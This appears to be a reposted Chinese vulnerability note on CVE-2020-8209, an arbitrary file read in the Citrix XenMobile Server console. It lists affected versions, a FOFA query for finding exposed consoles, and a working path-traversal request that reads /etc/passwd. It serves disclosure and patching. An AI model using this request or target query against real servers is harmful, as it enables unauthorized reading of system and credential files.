0x01 影響版本
RP2之前的XenMobile服務器10.12
RP4之前的XenMobile服務器10.11
RP6之前的XenMobile服務器10.10
10.9 RP5之前的XenMobile服務器
0x02 fofa語法
app="XenMobile-控制台"
應用截圖
0x03 POC
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
(CVE-2020-8209)XenMobile-控制台存在任意文件讀取漏洞
免責聲明!
本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。
猜您在找
CVE-2020-3452 CISCO ASA遠程任意文件讀取漏洞
Rand函數引發的安全問題 —— OSSN任意文件讀取漏洞(CVE-2020-10560)
【CVE-2020-1938】Tomcat AJP 任意文件讀取和包含漏洞分析記錄
Grafana 任意文件讀取漏洞(CVE-2021-43798)
【漏洞復現】ThinkAdmin v5和v6 未授權列目錄任意文件讀取(CVE-2020-25540)
【漏洞復現】CVE-2021-36749 Apache Druid LoadData 任意文件讀取漏洞
phpstudy_pro小皮最新版本nginx 默認存在任意文件解析漏洞
Grafana 任意文件讀取漏洞 (CVE-2021-43798)學習
CVE-2020-3452 CISCO ASA遠程任意文件讀取 poc
Atlassian Confluence任意文件讀取漏洞